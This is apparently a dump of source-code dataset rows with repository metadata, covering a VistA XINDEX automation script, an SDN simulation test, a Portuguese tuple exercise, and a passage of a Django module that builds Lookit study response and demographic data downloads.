if (sys.argv[5] and sys.argv[6]):
VistA.login(sys.argv[5],sys.argv[6])
if VistA.type=='cache':
try:
VistA.ZN(sys.argv[4])
except IndexError,no_namechange:
pass
VistA.wait(PROMPT)
VistA.write('K ^XUTL("XQ",$J)')
VistA.write('D ^XINDEX')
if VistA.type == 'cache':
VistA.wait('No =>')
VistA.write('No')
arglist = sys.argv[2].split(',')
for routine in arglist:
VistA.wait('Routine:')
VistA.write(routine)
VistA.wait('Routine:')
VistA.write('')
selectionList = ['Select BUILD NAME:',
'Select INSTALL NAME:',
'Select PACKAGE NAME:']
while True:
index = VistA.multiwait(selectionList)
VistA.write('')
if index == len(selectionList) - 1:
break
VistA.wait('warnings?')
VistA.write('No')
VistA.wait('routines?')
VistA.write('NO')
VistA.wait('DEVICE:')
VistA.write(';;9999')
if sys.platform == 'win32':
VistA.wait('Right Margin:')
VistA.write('')
VistA.write('')
VistA.wait('continue:',60)
VistA.write('')
VistA.wait('--- END ---',60)
VistA.write('h') | 25.085106 | 57 | 0.649703 | import sys
sys.path = [sys.argv[7] + '/lib/vista'] + sys.path
from OSEHRAHelper import ConnectToMUMPS,PROMPT
VistA=ConnectToMUMPS(sys.argv[1],sys.argv[3],sys.argv[4])
if (sys.argv[5] and sys.argv[6]):
VistA.login(sys.argv[5],sys.argv[6])
if VistA.type=='cache':
try:
VistA.ZN(sys.argv[4])
except IndexError,no_namechange:
pass
VistA.wait(PROMPT)
VistA.write('K ^XUTL("XQ",$J)')
VistA.write('D ^XINDEX')
if VistA.type == 'cache':
VistA.wait('No =>')
VistA.write('No')
arglist = sys.argv[2].split(',')
for routine in arglist:
VistA.wait('Routine:')
VistA.write(routine)
VistA.wait('Routine:')
VistA.write('')
selectionList = ['Select BUILD NAME:',
'Select INSTALL NAME:',
'Select PACKAGE NAME:']
while True:
index = VistA.multiwait(selectionList)
VistA.write('')
if index == len(selectionList) - 1:
break
VistA.wait('warnings?')
VistA.write('No')
VistA.wait('routines?')
VistA.write('NO')
VistA.wait('DEVICE:')
VistA.write(';;9999')
if sys.platform == 'win32':
VistA.wait('Right Margin:')
VistA.write('')
VistA.write('')
VistA.wait('continue:',60)
VistA.write('')
VistA.wait('--- END ---',60)
VistA.write('h') | false | true |
f72ed91db2e8e38da901631f369f411c385dca7e | 1,057 | py | Python | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| 19.218182 | 45 | 0.689688 | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| true | true |
f72eda0648c579ea231b336ff3104e38d1b2f1b9 | 777 | py | Python | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | '''
Crie uma tupla preenchida com os 20 times do brasileirão da série A na ordem de colocação.
Depois mostre:
a: Os 5 primeiros colocados
b: Os últimos 4 colocados
c: times em ordem alfabética
d: em que posição está o time da Chapecoense?
'''
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| 45.705882 | 92 | 0.683398 |
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| true | true |
f72edb8b6c0044eda2bec7da52e82df5b9432d92 | 80,572 | py | Python | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 9 | 2018-06-26T17:15:27.000Z | 2021-11-21T17:19:01.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 496 | 2018-02-19T19:18:24.000Z | 2022-03-31T17:01:16.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 16 | 2018-07-06T23:35:39.000Z | 2021-11-21T17:52:58.000Z | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
# id: Unique key to identify data. Used as CSV column header and any portion before __ is used to create a
# sub-dictionary for JSON data.
id: str
description: str # Description for data dictionary
extractor: Callable[
[Union[Response, Dict]], Union[str, List]
] # Function to extract value from response instance or dict
optional: bool = False # is a column the user checks a box to include?
name: str = "" # used in template form for optional columns
include_by_default: bool = False # whether to initially check checkbox for field
identifiable: bool = False # used to determine filename signaling
# Columns for response downloads. Extractor functions expect Response instance
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
col.id
for col in RESPONSE_COLUMNS
if col.id.startswith("child__") or col.id.startswith("participant__")
]
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
selected_header_ids: Union[Set, List],
all_available_header_ids: Union[Set, KeysView],
) -> List:
"""Get ordered list of response headers for download.
Select and order the appropriate headers to include in a file download, based on
which optional headers are selected and which headers are available.
Args:
selected_header_ids: which optional headers to include (corresponding to id values in
RESPONSE_COLUMNS). Headers that are specified as optional in RESPONSE_COLUMNS will
only be included if listed in selected_header_ids.
all_available_header_ids: all header ids we have data for. Any header ids that are in
this set but not in RESPONSE_COLUMNS will be added to the end of the output list.
Returns:
List of headers to include, consisting of the following in order:
1) Headers in RESPONSE_COLUMNS, in order, omitting any that are optional and were not selected
2) Extra headers from all_available_header_ids not included in (1), in alpha order
"""
unselected_optional_ids = {
col.id
for col in RESPONSE_COLUMNS
if col.optional and col.id not in selected_header_ids
}
selected_standard_header_ids = [
col.id
for col in RESPONSE_COLUMNS[0:-2]
if col.id not in unselected_optional_ids
]
return selected_standard_header_ids + sorted(
list(
all_available_header_ids
- set(selected_standard_header_ids)
- unselected_optional_ids
)
)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
"""Get ordered list of demographic headers for download.
Args:
selected_header_ids(set or list): which optional headers to include (corresponding
to id values in DEMOGRAPHIC_COLUMNS).
Returns:
Ordered list of headers to include in download
Headers are id values from DEMOGRAPHIC_COLUMNS in order, omitting any that are optional
and were not included in selected_header_ids.
"""
if selected_header_ids is None:
selected_header_ids = {}
return [
col.id
for col in DEMOGRAPHIC_COLUMNS
if col.id in selected_header_ids or not col.optional
]
def construct_response_dictionary(
resp, columns, optional_headers, include_exp_data=True
):
if optional_headers is None:
optional_headers = {}
resp_dict = {}
for col in columns:
if col.id in optional_headers or not col.optional:
try:
object_name, field_name = col.id.split("__")
if object_name in resp_dict:
resp_dict[object_name][field_name] = col.extractor(resp)
else:
resp_dict[object_name] = {field_name: col.extractor(resp)}
except ValueError:
resp_dict[col.id] = col.extractor(resp)
# Include exp_data field in dictionary?
if include_exp_data:
resp_dict["exp_data"] = resp.exp_data
return resp_dict
class FrameDataRow(NamedTuple):
response_uuid: str
child_hashed_id: str
frame_id: str
event_number: str
key: str
value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
"""Get list of data stored in response's exp_data and global_event_timings fields.
Args:
resp(Response or dict): response data to process. If dict, must contain fields
child__uuid, study__uuid, study__salt, study__hash_digits, uuid, exp_data, and
global_event_timings.
Returns:
List of FrameDataRows each representing a single piece of data from global_event_timings or
exp_data. Descriptions of each field of the FrameDataRow are given in FRAME_DATA_HEADER_DESCRIPTIONS.
"""
if type(resp) is not dict:
resp = {
"child__uuid": resp.child.uuid,
"study__uuid": resp.study.uuid,
"study__salt": resp.study.salt,
"study__hash_digits": resp.study.hash_digits,
"uuid": resp.uuid,
"exp_data": resp.exp_data,
"global_event_timings": resp.global_event_timings,
}
frame_data_tuples = []
child_hashed_id = hash_id(
resp["child__uuid"],
resp["study__uuid"],
resp["study__salt"],
resp["study__hash_digits"],
)
# First add all of the global event timings as events with frame_id "global"
for (iEvent, event) in enumerate(resp["global_event_timings"]):
for (key, value) in event.items():
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id="global",
key=key,
event_number=str(iEvent),
value=value,
)
)
# Next add all data in exp_data
event_prefix = "eventTimings."
for frame_id, frame_data in resp["exp_data"].items():
for (key, value) in flatten_dict(frame_data).items():
# Process event data separately and include event_number within frame
if key.startswith(event_prefix):
key_pieces = key.split(".")
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=".".join(key_pieces[2:]),
event_number=str(key_pieces[1]),
value=value,
)
)
# omit frameType values from CSV
elif key == "frameType":
continue
# Omit the DOB from any exit survey
elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
continue
# Omit empty generatedProperties values from CSV
elif key == "generatedProperties" and not value:
continue
# For all other data, create a regular entry with frame_id and no event #
else:
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=key,
event_number="",
value=value,
)
)
return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
unique_frame_ids = set()
event_keys = set()
unique_frame_keys_dict = {}
for page_num in response_paginator.page_range:
page_of_responses = response_paginator.page(page_num)
for resp in page_of_responses:
this_resp_data = get_frame_data(resp)
these_ids = {
d.frame_id.partition("-")[2]
for d in this_resp_data
if not d.frame_id == "global"
}
event_keys = event_keys | {
d.key for d in this_resp_data if d.event_number != ""
}
unique_frame_ids = unique_frame_ids | these_ids
for frame_id in these_ids:
these_keys = {
d.key
for d in this_resp_data
